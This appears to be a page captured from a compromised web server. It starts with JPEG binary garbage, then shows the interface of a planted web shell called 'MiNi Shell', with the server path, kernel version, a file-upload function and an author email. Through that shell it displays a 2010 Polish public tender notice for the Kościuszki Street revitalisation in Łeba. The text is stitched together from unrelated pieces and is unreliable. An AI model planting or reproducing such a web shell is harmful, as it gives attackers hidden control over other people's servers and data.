JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100409/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100409/100800-N-2010.html

<p class="kh_header"><b>Łeba: Rewitalizacja historycznego centrum miasta  Łeba poprzez  przebudowę  obszaru  ulicy  Kościuszki w Łebie - I etap</b><br>
<b>Numer ogłoszenia: 100800 - 2010; data zamieszczenia: 09.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Łeba , ul. Kościuszki 90, 84-360 Łeba, woj. pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lebabip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja historycznego centrum miasta  Łeba poprzez  przebudowę  obszaru  ulicy  Kościuszki w Łebie - I etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest w ramach rewitalizacji historycznego centrum miasta  Łeba, zaprojektowanie i wykonanie  przebudowy ulicy  Kościuszki w Łebie - Etap I,    tj   w szczególności:
a/  Opracowanie projektu budowlanego i wykonawczego przebudowy - branża drogowa, elektryczna, sanitarna, dla zakresu okr. w pkt. 3.1. i 3.2 , z uzyskaniem pozwolenia na budowę i pozwolenia wodnoprawnego na  odprowadzenie wód opadowych  do k. Chełst.
b/  Wykonanie  prac budowlano montażowych dla zakresu okr.  w ogłoszeniu , tj  w pkt. 3.1  i  3.2   

3.1. Zakres  terytorialny  robót  budowlanych obejmuje :

a/  Dla robót drogowych nawierzchniowych i oświetlenia - ulicę Kościuszki na odcinku od budynku Urzędu Miasta   do  skrzyżowania z ul.10 marca , o długości ok. 410 m wraz ze  skrzyżowaniami z ulicami Łąkowa,  Kościelna, 1 Maja, 10 marca o łącznej pow. utwardzonej ok. 7660 m2
b/ Dla  kanalizacji deszczowej - ulicę Kościuszki na odcinku od budynku Urzędu Miasta  do  skrzyżowania z ul.10 marca  o długości ok. 410 m  oraz dodatkowo  dla odprowadzenia wód - odcinek 140m od skrzyżowania  z  ul.10 marca do kanału Chełst.
c/ Dla monitoringu - ulicę Kościuszki na odcinku od budynku Urzędu Miasta   do   skrzyżowania z ul.10 marca  o długości ok. 410 m   oraz  odcinek ok. 260m  od Urzędu Miasta  do planowanego Centrum Dozoru  w budynku Policji przy ul.Kościuszki i skrzyżow. z ul. Nowęcińską   
d/  Ciąg pieszo jezdny planowany jest  na odcinku  pomiędzy skrzyżowaniami  z ul.Łąkową i ul.10 marca . 
3.2. Zakres rzeczowy przebudowy  w szczególności  obejmuje :

a/  Zakres określony opracowanym  programem  funkcjonalno-użytkowym  ,  w szczególności:

-Opracowanie dokumentacji   technicznej  wg wymagań  zawartych  w  programie. Wykonawca zobowiązany jest  do konsultowania  z Zamawiającym   szczegółowych rozwiązań architektonicznych ulicy, rozwiązań  planowanej organizacji ruchu drogowego  i  akceptacji Zamawiającego przed ich ostatecznym  przyjęciem  do projektu. W ramach projektu organizacji ruchu należy zaprojektować i wykonać sygnalizację świetlną na skrzyżowaniu ulicy Kościuszki z  ul.10 Marca i 11 listopada. W tym celu należy wykonać niezbędne pomiary natężeń ruchu drogowego w okresie miarodajnym dla tego   skrzyżowania tj, lipiec. 
- rozbiórkę w całości istniejącej nawierzchni  pasa drogowego , w tym  nawierzchni asfaltowej jezdni - 3562,5m2. 
- wymianę gruntu  na całości  powierzchni  utwardzonej   z godnie z zaleceniami  opracowanej  dokumentacji  geotechnicznej 
- wykonanie   konstr. jezdni  z wjazdami i skrzyżowaniami ulic poprzecznych  - nawierzchnia o pow. ok.  3230,0  m2 z bruku  kamiennego  z odzysku. 
- wykonanie chodników z kostki granitowej  i  płyt kamiennych  o  powierzchni  ok.  4430 m2 z materiału  wykonawcy .
- obustronny  ściek  z bruku kamiennego
- budowę kanalizacji deszczowej  ok. łącznej dł.  ok. 720 m , odprowadzeniem  do kanału Chełst ,wraz z separatorem i osadnikiem i  ew. przepomownią 
- demontaż istniejącego oświetlenia ulicznego
- budowę nowego oświetlenia ulicznego - słupy żeliwne stylowe o wysokości ok. 4m obustronnie w ulicy ( wzór latarni  do ustalenia  z Zamawiającym na etapie   projektowania) - szt 37 wraz z urządzeniami rozdzielczymi i linią kablową. Latarnie  dodatkowo wyposażone w uchwyty dla flag oraz gniazda elektr. do podłączania okazjonalnych  ozdób świetlnych .
- urządzenie zieleni : powierzchnie przy budynkach   ok. 300 m2 - nasadzenia niskie  +  ok. 380 m2   terenu nieutwardzonego wokół drzew .
- Nasadzenia  drzew -  wymagania: 
  Gatunek drzewa - lipa drobnolistna szkółkowana  92 szt.
  Wymiary - obwód pnia 25-30 cm   na wysokości 1,3m  od  poz. terenu.
  Wysokość drzewka  ok. 5 m 
  Zainstalowanie przy sadzeniu  2 rur drenażowych   do systemu korzeniowego  dla   podlewania 
   Osłona na całej powierzchni nieutwardzonej wokół pnia na poziomie chodnika - stalowa  w formie     rusztu , pod  ruch pieszy ,  ocynkowana + malowana.
   Osłona  pionowa  pnia   na wysokość 1,5m -  stalowa  z kutych elementów   ozdobnych , ocynkowana  i malowana,  mocowana   w sposób   trwały do podłoża.
-  wykonanie elementów małej architektury ławki 46 szt,  kosze żeliwne  na 
  śmieci  ok. 50szt. , słupki żeliwne obramowań  zieleni  ok.  200 szt,   
   obramowania   zieleni metalowe  ok. 330 m
- wykonanie nowych schodów wejściowych od budynków o wys do ok. 1,0 m ,
  wykończenie z granitu kol.czerwonego, obrobienie powierzchni -  powierzchnia   
  cięta mechanicznie i  płomieniowana.

b/ Wykonanie  niezbędnych prac na sieci wodociągowej  na przebudowywanym odcinku, tj
- wymianę wszystkich przyłączy wodociągowych na przebudowywanym odcinku  ulicy (do granic posesji)  w ilości 57 szt : ? 40PE  dla bud. jednorodzinnych i ?50PE  dla wielorodzinnych wraz z  zasuwami  dla każdego przyłącza z  kpl. obudową 
- wymianę  zasuw głównych na sieci rozdzielczej ?150 żeliwnej  w  ulicy,  w  ilości  6 szt
- wykonanie wyprowadzenia z sieci wodociągowej w ul.Kościuszki  ? 150  do sieci w ulicy  ul.Kościelnej     odcinkiem ?110 PCV  o dł. ok. 15 m wraz z zasuwą. 

c/ Wykonanie  monitoringu miejskiego (wg koncepcji dołączonej  do SIWZ ) w zakresie :
  -  sieć kablowa w ulicy : od pkt K6 ( skrzyżowanie z ul.Nowęcińską) do pkt K3 ( skrzyżowania  z ul.10 marca - dł ok. 660 m ) z uwzględnieniem przebiegu aktualnie projektowanej miejskiej sieci  kanalizacji  teletechnicznej  z rur HDPE 40/3,7   w obszarze miasta , w tym w ulicy Kościuszki.   
   -  studio  ( Centrum Dozoru) :  w budynku Policji  przy ul.Kościuszki ,  wyposażone w urządzenia   dla  wszystkich  kamer jak  przyjęto w koncepcji załączonej do Specyfikacji   
   -  kamery : instalacja kamer w punktach K6 i K3 ,wg koncepcji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.23.10.00-5, 45.23.32.20-7, 45.23.32.93-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium   wymagane jest w kwocie  50 000,0   zł.
Wadium należy wnieść  w jednej z form przewidzianej  w art. 45    ust. 6 ustawy Prawo zamówień publicznych  przed  upływem terminu składania  ofert, który będzie wskazany  Wykonawcom dopuszczonym  do dalszego udziału  w postępowaniu   wraz przekazaniem  zaproszenia  do złożenia oferty .
 Dowód wpłaty wadium należy   załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie zlożenia wykazu wykonanych  robót budowlanych o charakterze  odpowiadającym  przedmiotowi zamówienia   tj rewitalizacji i odtworzenia  wyglądu starych ulic w miastach, w szczególności robót budowlanych polegających odtworzeniu starej nawierzchni z bruku kam. i elementów kamiennych w miejskich przestrzeniach publicznych -  w  ilości co najmniej  porównywalnej z  zamówieniem (6-8 tys. m2), wykonanych  w okresie ostatnich  5 lat  przed upływem terminu składania wniosków o  dopuszczenie  do udziału w przetargu, a jeśli okres  prowadzenia działalności oferenta jest krótszy - w tym okresie ), z podaniem ich rodzaju,  powierzchni ułożonej nawierzchni, wartości, daty i miejsca wykonania oraz  z dołączeniem dokumentów potwierdzających, że  roboty te zostały wykonane   zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone.
             Należy wykazać tylko te  roboty, które były wykonywane  bezpośrednio samodzielnie przez Oferenta, lub uczestników konsorcjum, o ile oferentem jest konsorcjum.  
a/  Dla  wykazu doświadczenia zostanie dokonana punktacja w skali 1-10 wg  wyliczenia : Liczba punktów ocenianego  oferenta = Ilość (pow.) ułożonej nawierzchni z bruku  kam. i elementów kamiennych odpowiadająca  wymaganiom SIWZ wykazana przez ocenianego oferenta  :  największa z wykazanych przez oferentów ułożona  powierzchnia z bruku kam. i elementów kamiennych odpowiadająca  wymaganiom  podanym w ogłoszeniu  x  10 .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie złożenia wykazu osób, które   będą  uczestniczyć w  wykonaniu  zamówienia  w zakresie  projektowania i  kierowania   robotami, wraz z informacjami poświadczającymi ich kwalifikacje zawodowe, doświadczenie, wykształcenie niezbędne  do wykonania zmówienia , a także zakresu  zakresu  wykonywanych przez nie czynności oraz informacja o podstawie dysponowania tymi osobami.
Oświadczenie, że osoby te posiadają uprawnienia budowlane do pełnienia  samodzielnych  funkcji  technicznych w budownictwie w zakresie odpowiednich branż  występujących w zamówieniu , tj drogowa, elektryczna i sanitarna  i  przynależą do odpowiednich Izb Samorządu Zawodowego.
Wymagane warunki, to   dysponiowanie :
 - projektantem lub  projektantami  w odpowiednich   do przedmiotu zamówienia branżach . 
- kierownikiem  budowy w branży drogowej posiadającym  doświadczenie  zawodowe  na stanowisku kierownika budowy co najmniej 3 lata 
- kierownikiem  budowy  branży elektrycznej posiadającym  doświadczenie  zawodowe  na stanowisku kierownika budowy co najmniej 3 lata
- kierownikiem  budowy  branży  sanitarnej  posiadającym  doświadczenie  zawodowe  na stanowisku kierownika budowy co najmniej 3 lata
     Warunek  może być  spełniony  łącznie  w wypadku składania oferty przez  konsorcjum kilku podmiotów 
Ocena  wg  formuły : spełnia, lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Sprawdzenie  złożenia informacji z banku lub SKOK, w których wykonawca  posiada rachunek, potwierdzająca   wysokość  posiadanych środków  finansowych   lub zdolność kredytową   wykonawcy , wystawionej nie wcześniej niż 3 m-ce  przed upływem terminu składania  wniosków  o dopuszczenie  do udziału w postępowaniu.
Ocena  wg  formuły : spełnia, lub nie spełnia.

2.Sprawdzenie złożenia opłaconej polisy , lub innego  dokumentu  potwierdzającego ,że wykonawca  jest ubezpieczony  od  odpowiedzialności cywilnej   w zakresie prowadzonej  działalności  związanej z przedmiotem zamówienia  oraz oświadczenia o doknaniu  ubezpieczenia od odpowiedzialności cywilnej w zakresie działalności  zawiązanej z przedmiotem  zamówienia określonym w niniejszym ogłoszeniu na wartość nie mniejszą niż 4 000 000,0 zł   przed dniem  podpisania  umowy na wykonanie przedmiotu   zamówienia . 
Ocena  wg  formuły : spełnia, lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne   zobowiązanie innych podmiotów  do oddania oferentowi do dyspozycji   niezbędnych zasobów  na okres korzystania z nich przy realizacji zamówienia będącego przedmiotem niniejszego  postępowania , jeżeli   wykonawca  będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych tych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Doświadczenie  - 100%</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lebabip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Łeba
84-360 Łeba
ul.Kościuszki 90.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2010 godzina 13:00, miejsce: Urząd Miasta Łeba ( sekretariat  pok. nr 11))
84-360 Łeba
ul.Kościuszki 90.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest  dofinansowywany ze środków UE ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com